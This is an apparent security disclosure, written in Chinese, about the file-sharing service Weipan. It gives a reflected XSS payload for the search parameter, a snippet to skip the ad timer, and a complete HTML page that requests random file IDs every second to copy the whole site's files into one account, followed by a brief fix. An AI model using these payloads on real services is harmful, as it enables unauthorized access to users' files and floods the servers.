1.XSS:威盘有个搜索功能,发现了典型的form xss。
?s=%22+onmouseover%3Djavascript%3Aalert%28documents.cookie%29%3E
2.任意收藏下载:
威盘的每个文件是这样编号的:,点击进入,等10秒广告(不想等待的话,清空地址栏输入javascript:document.getElementById('loadingbox').style.display='none'; document.getElementById('btnbox').style.display='block';)会出现下载地址,有个另存为我的网盘,然后就保存了,如果弹出你没有威盘账号,涛涛电脑知识网,好办,随便上传一个文件,威盘自动为你分配一个账号,如tempuser1334905592,我是从下面的代码里看到的
var loadcount = 1;
function saveas(id) {
if(jQuery.cookie('uid')==null) {
alert('您还没有登录,请点击右上角登录或免费注册.');
}
else {
$.ajaxSetup({async : true, cache : false, type: "GET"});
$.getJSON('/json/saveas?id=' + id, '' ,
function(json){
if(json.result != true) { alert(json.msg); }
else { if(confirm("文件复制另存成功,是否现在去你的威盘看看?")) location = '/user/admin/' + jQuery.cookie('userid'); }
});
}
}
$().ready(function(){
setTimeout("document.getElementById('loadingbox').style.display='none'; document.getElementById('btnbox').style.display='block'; ", 10000);
});
另存为是一个saveas(id)函数。现在你打开这个地址?id=' id' (saveas函数的核心),它通过异步的方式在后台把这个id添加到你的账户里。这也是任意收藏的前提,好了写个工具,间隔打开这个链接,后面的id是7-8位的数字组合,经测试最小为3440540,最大至少为10018135,这样一会儿你的临时临时账户里就会是威盘所有(?)文件的信息了,www.xuhantao.com,所谓任意收藏。
利用代码:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>威盘任意收藏</title>
<style type="text/css">
<!--
body,td,th {
font-size: 24px;
color: #FF6;
}
body {
background-color: #366;
margin-left: 20px;
margin-top: 20px;
margin-right: 20px;
margin-bottom: 20px;
}
a{ color:#FFF}
-->
</style></head>
<body>
<script>
var s='';
function shua(){
setTimeout("shua()",1000);
s="?id="+eval(Math.round(Math.random()*6577595)+3440540);
document.getElementById("my").src=s;
document.getElementById("t").innerHTML="<a href="+s+">"+s+"</a><br /><br />"
}
shua();
</script>
<p>
收藏:<span id="t"></span>
</p>
<iframe id="my" width="80%"></iframe>
</body>
</html>
通过任意收藏测试效果:
修复方案:
设置权限。不然服务器会被刷爆的。
作者 小四
